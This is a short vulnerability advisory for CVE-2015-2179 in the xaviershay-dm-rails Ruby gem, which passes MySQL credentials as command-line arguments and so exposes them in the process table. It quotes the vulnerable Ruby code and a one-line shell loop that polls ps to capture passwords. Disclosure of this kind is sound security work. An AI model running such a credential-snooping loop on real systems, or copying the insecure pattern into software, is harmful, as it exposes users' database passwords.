Advisory #: 115
Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
CVE-ID:[CVE-2015-2179]
CWE:
Download Site: https://rubygems.org/gems/xaviershay-dm-rails
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal@rhnh.net
Advisory: http://www.vapid.dhs.org/advisory.php?v=115
Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically.
Vulnerability:
The problem is with the execute function exposing the user credentials to the process table. Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb: def execute(statement) system( 'mysql', (username.blank? ? '' : "--user=#{username}"), (password.blank? ? '' : "--password=#{password}"), '-e', statement ) end
Export: JSON TEXT XML
Exploit Code:
  1. $ while (true) do ps -ef |grep [p]assword; done
Screen Shots:
Notes:
118579